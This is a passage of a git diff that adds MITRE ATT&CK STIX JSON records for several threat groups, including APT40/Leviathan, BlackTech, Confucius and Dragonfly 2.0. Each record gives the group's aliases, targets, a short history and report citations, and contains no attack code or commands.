b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--a313e17c-de75-4932-9247-6b7dcf18c2c5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-19T21:44:20.477Z", + "name": "Frankenstein", + "description": "[Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components.(Citation: Talos Frankenstein June 2019) ", + "aliases": [ + "Frankenstein" + ], + "x_mitre_deprecated": true, + "x_mitre_version": "1.1", + "type": "intrusion-set", + "id": "intrusion-set--6b1b551c-d770-4f95-8cfc-3cd253c4c04e", + "created": "2020-05-11T15:21:09.438Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0101", + "external_id": "G0101" + }, + { + "source_name": "Talos Frankenstein June 2019", + "description": "Adamitis, D. et al. (2019, June 4). It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.", + "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01.json new file mode 100644 index 0000000000000000000000000000000000000000..28b418a968e7bdb789544e96a8d1b60892608d89 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--49ff7453-0f4a-48ec-85b8-d3a5c6685681", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "DarkHydrus" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Oleg Skulkin, Group-IB" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0079", + "external_id": "G0079" + }, + { + "source_name": "DarkHydrus", + "description": "(Citation: Unit 42 DarkHydrus July 2018)" + }, + { + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "description": "Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.", + "source_name": "Unit 42 DarkHydrus July 2018" + }, + { + "url": "https://pan-unit42.github.io/playbook_viewer/", + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.", + "source_name": "Unit 42 Playbook Dec 2017" + } + ], + "modified": "2021-10-12T19:52:22.454Z", + "name": "DarkHydrus", + "description": "[DarkHydrus](https://attack.mitre.org/groups/G0079) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. (Citation: Unit 42 DarkHydrus July 2018) (Citation: Unit 42 Playbook Dec 2017)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6eded342-33e5-4451-b6b2-e1c62863129f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6eded342-33e5-4451-b6b2-e1c62863129f.json new file mode 100644 index 0000000000000000000000000000000000000000..996abc542efca721ef89b0a1d5d556b5ac730b48 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6eded342-33e5-4451-b6b2-e1c62863129f.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--23fd7cc0-fd20-4ec3-aeca-c01e35ecd1e9", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Confucius", + "Confucius APT" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--6eded342-33e5-4451-b6b2-e1c62863129f", + "created": "2021-12-26T23:11:39.442Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0142", + "url": "https://attack.mitre.org/groups/G0142" + }, + { + "source_name": "TrendMicro Confucius APT Feb 2018", + "url": "https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html", + "description": "Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021." + }, + { + "source_name": "TrendMicro Confucius APT Aug 2021", + "url": "https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html", + "description": "Lunghi, D. (2021, August 17). Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military. Retrieved December 26, 2021." + }, + { + "source_name": "Uptycs Confucius APT Jan 2021", + "url": "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", + "description": "Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Confucius](https://attack.mitre.org/groups/G0142) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://attack.mitre.org/groups/G0142) and [Patchwork](https://attack.mitre.org/groups/G0040), particularly in their respective custom malware code and targets.(Citation: TrendMicro Confucius APT Feb 2018)(Citation: TrendMicro Confucius APT Aug 2021)(Citation: Uptycs Confucius APT Jan 2021)", + "modified": "2022-06-30T20:15:32.697Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Confucius", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8.json new file mode 100644 index 0000000000000000000000000000000000000000..aa21dfbe16c0c0226dca6b2e4ae832b95c90ff3d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--bc598fca-f762-465d-af88-58032cf05283", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "BlackTech", + "Palmerworm" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Tatsuya Daitoku, Cyber Defense Institute, Inc.", + "Hannah Simes, BT Security" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8", + "created": "2020-05-05T18:36:45.970Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0098", + "url": "https://attack.mitre.org/groups/G0098" + }, + { + "source_name": "Palmerworm", + "description": "(Citation: Symantec Palmerworm Sep 2020)(Citation: IronNet BlackTech Oct 2021)" + }, + { + "source_name": "TrendMicro BlackTech June 2017", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", + "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020." + }, + { + "source_name": "IronNet BlackTech Oct 2021", + "url": "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "description": "Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022." + }, + { + "source_name": "Reuters Taiwan BlackTech August 2020", + "url": "https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK", + "description": "Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022." + }, + { + "source_name": "Symantec Palmerworm Sep 2020", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", + "description": "Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020)", + "modified": "2022-04-06T13:14:27.477Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "BlackTech", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e.json new file mode 100644 index 0000000000000000000000000000000000000000..a1cd6a832b12ac8ba1321fbd7834ac0aae40a434 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e.json @@ -0,0 +1,119 @@ +{ + "type": "bundle", + "id": "bundle--6ef1ca90-440b-4481-82f5-0439e4a4b0fb", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Leviathan", + "MUDCARP", + "Kryptonite Panda", + "Gadolinium", + "BRONZE MOHAWK", + "TEMP.Jumper", + "APT40", + "TEMP.Periscope" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Valerii Marchuk, Cybersecurity Help s.r.o." + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e", + "created": "2018-04-18T17:59:24.739Z", + "x_mitre_version": "3.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0065", + "url": "https://attack.mitre.org/groups/G0065" + }, + { + "source_name": "MUDCARP", + "description": "(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)" + }, + { + "source_name": "Kryptonite Panda", + "description": "(Citation: CISA AA21-200A APT40 July 2021)(Citation: Crowdstrike KRYPTONITE PANDA August 2018)" + }, + { + "source_name": "Gadolinium", + "description": "(Citation: CISA AA21-200A APT40 July 2021)(Citation: MSTIC GADOLINIUM September 2020)" + }, + { + "source_name": "BRONZE MOHAWK", + "description": "(Citation: CISA AA21-200A APT40 July 2021)(Citation: SecureWorks BRONZE MOHAWK n.d.)" + }, + { + "source_name": "Leviathan", + "description": "(Citation: Proofpoint Leviathan Oct 2017)" + }, + { + "source_name": "TEMP.Jumper", + "description": "[Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye APT40 March 2019)" + }, + { + "source_name": "TEMP.Periscope", + "description": "[Leviathan](https://attack.mitre.org/groups/G0065) was previously reported upon by FireEye as TEMP.Periscope and TEMP.Jumper.(Citation: CISA AA21-200A APT40 July 2021)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)" + }, + { + "source_name": "Accenture MUDCARP March 2019", + "url": "https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies", + "description": "Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021." + }, + { + "source_name": "Crowdstrike KRYPTONITE PANDA August 2018", + "url": "https://www.crowdstrike.com/blog/two-birds-one-stone-panda/", + "description": "Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021." + }, + { + "source_name": "Proofpoint Leviathan Oct 2017", + "url": "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "description": "Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018." + }, + { + "source_name": "MSTIC GADOLINIUM September 2020", + "url": "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/", + "description": "Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021." + }, + { + "source_name": "CISA AA21-200A APT40 July 2021", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa21-200a", + "description": "CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory \u2013 Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China\u2019s MSS Hainan State Security Department. Retrieved August 12, 2021." + }, + { + "source_name": "APT40", + "description": "FireEye reporting on TEMP.Periscope (which was combined into APT40) indicated TEMP.Periscope was reported upon as Leviathan.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)" + }, + { + "source_name": "FireEye Periscope March 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018." + }, + { + "source_name": "FireEye APT40 March 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "description": "Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019." + }, + { + "source_name": "SecureWorks BRONZE MOHAWK n.d.", + "url": "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "description": "SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)", + "modified": "2022-04-15T15:15:51.198Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Leviathan", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7331c66a-5601-4d3f-acf6-ad9e3035eb40.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7331c66a-5601-4d3f-acf6-ad9e3035eb40.json new file mode 100644 index 0000000000000000000000000000000000000000..83e9fd43d276c039a035ecac0a2bc5f5c25d5337 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7331c66a-5601-4d3f-acf6-ad9e3035eb40.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--919de3ad-e285-496f-889e-f292d9af934d", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Group5" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--7331c66a-5601-4d3f-acf6-ad9e3035eb40", + "type": "intrusion-set", + "created": "2017-05-31T21:32:08.304Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0043", + "url": "https://attack.mitre.org/groups/G0043", + "source_name": "mitre-attack" + }, + { + "source_name": "Group5", + "description": "(Citation: Citizen Lab Group5)" + }, + { + "url": "https://citizenlab.ca/2016/08/group5-syria/", + "description": "Scott-Railton, J., et al. (2016, August 2). Group5: Syria and the Iranian Connection. Retrieved September 26, 2016.", + "source_name": "Citizen Lab Group5" + } + ], + "modified": "2020-03-30T19:07:39.812Z", + "name": "Group5", + "description": "[Group5](https://attack.mitre.org/groups/G0043) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://attack.mitre.org/groups/G0043) has used two commonly available remote access tools (RATs), [njRAT](https://attack.mitre.org/software/S0385) and [NanoCore](https://attack.mitre.org/software/S0336), as well as an Android RAT, DroidJack. (Citation: Citizen Lab Group5)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee.json new file mode 100644 index 0000000000000000000000000000000000000000..7790bb919c7fb61e344e27dd6c6dda8cccead0dd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--e0557666-0261-42b2-a8ea-cc3733505270", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Blue Mockingbird" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Tony Lambert, Red Canary" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee", + "type": "intrusion-set", + "created": "2020-05-26T20:09:39.139Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0108", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0108" + }, + { + "source_name": "RedCanary Mockingbird May 2020", + "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/", + "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020." + } + ], + "modified": "2021-10-12T21:46:13.007Z", + "name": "Blue Mockingbird", + "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.(Citation: RedCanary Mockingbird May 2020)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb.json new file mode 100644 index 0000000000000000000000000000000000000000..050ace1bcdc9ba1b7e59d5579ce013c42e3f854a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--4992f76f-6697-426f-b00e-d6b86ae4ceb5", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "SilverTerrier" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb", + "type": "intrusion-set", + "created": "2019-01-29T21:36:59.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0083", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0083" + }, + { + "source_name": "SilverTerrier", + "description": "(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)" + }, + { + "description": "Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.", + "url": "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise", + "source_name": "Unit42 SilverTerrier 2018" + }, + { + "description": "Renals, P., Conant, S. (2016). SILVERTERRIER: The Next Evolution in Nigerian Cybercrime. Retrieved November 13, 2018.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf", + "source_name": "Unit42 SilverTerrier 2016" + } + ], + "modified": "2020-05-19T23:26:11.780Z", + "name": "SilverTerrier", + "description": "[SilverTerrier](https://attack.mitre.org/groups/G0083) is a Nigerian threat group that has been seen active since 2014. [SilverTerrier](https://attack.mitre.org/groups/G0083) mainly targets organizations in high technology, higher education, and manufacturing.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json new file mode 100644 index 0000000000000000000000000000000000000000..a9d8ace2f910ffb1296de99fbf57b432d58ddc44 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json @@ -0,0 +1,87 @@ +{ + "type": "bundle", + "id": "bundle--ba68a178-ca9f-47e8-9cfd-8f345a0fc29f", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Dragonfly 2.0", + "IRON LIBERTY", + "DYMALLOY", + "Berserk Bear" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0074", + "url": "https://attack.mitre.org/groups/G0074" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Fortune Dragonfly 2.0 Sept 2017)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)" + }, + { + "source_name": "Dragonfly 2.0", + "description": "(Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)" + }, + { + "source_name": "Dragos DYMALLOY ", + "url": "https://www.dragos.com/threat/dymalloy/", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020." + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018." + }, + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." + }, + { + "source_name": "Secureworks IRON LIBERTY", + "url": "https://www.secureworks.com/research/threat-profiles/iron-liberty", + "description": "Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020." + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "url": "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "description": "Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017." + }, + { + "source_name": "US-CERT TA18-074A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )", + "modified": "2022-05-11T14:00:00.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dragonfly 2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70.json new file mode 100644 index 0000000000000000000000000000000000000000..47204639b7d1e17889d8a014d6081bed8c758b23 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--7feb6c74-adfb-4fb1-8c58-120bf4eaa579", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Stolen Pencil" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70", + "type": "intrusion-set", + "created": "2019-02-05T17:56:55.233Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "external_id": "G0086", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0086" + }, + { + "source_name": "Stolen Pencil", + "description": "(Citation: Netscout Stolen Pencil Dec 2018)" + }, + { + "source_name": "Netscout Stolen Pencil Dec 2018", + "url": "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "description": "ASERT team. (2018, December 5). STOLEN PENCIL Campaign Targets Academia. Retrieved February 5, 2019." + } + ], + "modified": "2021-10-07T12:21:31.309Z", + "name": "Stolen Pencil", + "description": "[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear.(Citation: Netscout Stolen Pencil Dec 2018)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6.json 